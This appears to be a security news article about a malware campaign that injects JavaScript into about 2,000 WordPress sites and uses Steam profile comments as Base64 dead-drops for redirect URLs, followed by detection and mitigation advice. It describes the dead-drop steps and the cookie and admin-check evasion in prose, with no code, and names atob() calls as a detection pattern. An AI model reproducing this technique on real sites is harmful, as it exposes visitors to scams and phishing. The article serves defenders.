WordPress Sites Targeted by Malware Using Steam Profile Dead-Drops

Overview of the Steam-Based Malware Campaign

A sophisticated malware campaign has successfully compromised nearly 2,000 WordPress websites, leveraging a novel technique to obfuscate its C2 infrastructure. According to BleepingComputer, threat actors are utilizing Steam Community profile comments as dead-drop resolvers to host encoded redirection instructions. This method allows the malware to bypass traditional security filters that typically flag connections to known malicious domains, as the initial request is directed at a high-reputation site (steamcommunity.com).

The campaign primarily aims to redirect legitimate site visitors to a variety of malicious destinations, including technical support scams, Phishing pages, and unauthorized advertisements. By hijacking the trust associated with established gaming platforms, attackers maintain persistence and evade detection by standard web application firewalls.

Analysis of WordPress Malware Steam Profile C2 Resolution

The technical execution of this campaign begins with the injection of a malicious JavaScript snippet into the victim’s WordPress environment. This script is often appended to legitimate files such as functions.php or header templates. Rather than hardcoding the final destination URL, which would be an easily identifiable IoC, the script is programmed to fetch content from a specific Steam Community profile.

The Dead-Drop Mechanism

The attackers populate the ‘About’ section or the comment history of a Steam profile with a Base64-encoded string. The injected script on the WordPress site performs the following actions:

1. It initiates an asynchronous request to the Steam profile page.
2. It parses the HTML response to locate a specific string or delimiter.
3. It extracts the Base64-encoded data, which contains the actual C2 server address or the final redirect URL.
4. It decodes this string on the fly and redirects the user’s browser to the intended malicious target.

This architecture provides the threat actors with significant agility. If a C2 server is taken down, they simply update the string on the Steam profile to point to a new infrastructure. This prevents the need to re-infect the 2,000+ WordPress sites, as the redirection logic remains centralized on the Steam platform.

Evasion and Persistence Tactics

Security professionals often struggle with this specific TTP because the traffic patterns appear benign at first glance. Most EDR and SIEM solutions are configured to trust traffic to and from major content delivery networks and social platforms. By using Steam as an intermediary, the attackers effectively “blind” many automated detection systems.

Furthermore, the malware often employs cookies to ensure that the redirect only triggers once per user session. This makes manual verification difficult for a SOC analyst, as subsequent visits to the infected site may appear perfectly normal. The script may also check for the presence of administrative cookies or specific user-agent strings to avoid triggering when a site owner is logged in, further extending the lifespan of the infection.

Detection and Mitigation Strategies

To effectively defend against these threats, administrators must move beyond basic signature-based detection. Understanding how to detect WordPress malware redirect scripts requires a combination of file integrity monitoring and network traffic analysis.

Actionable Recommendations:

• File Integrity Monitoring: Implement tools that alert on any changes to core WordPress files or active theme directories. Pay particular attention to wp-includes and wp-content/themes where these scripts are frequently hidden.
• Outbound Traffic Filtering: Monitor server-side logs for unusual outbound requests to external social media or gaming platforms. While Steam is a legitimate site, a web server hosting a blog or business site has no functional requirement to communicate with it.
• Script Auditing: Regularly audit external scripts and look for obfuscated JavaScript or calls to atob() (Base64 decoding) that are paired with external network requests.
• Security Plugins: Utilize reputable security plugins that perform deep scans for known malicious patterns and unauthorized injections.
• Credential Hygiene: Ensure all administrative accounts use strong, unique passwords and multi-factor authentication to prevent the initial compromise via brute force or credential stuffing.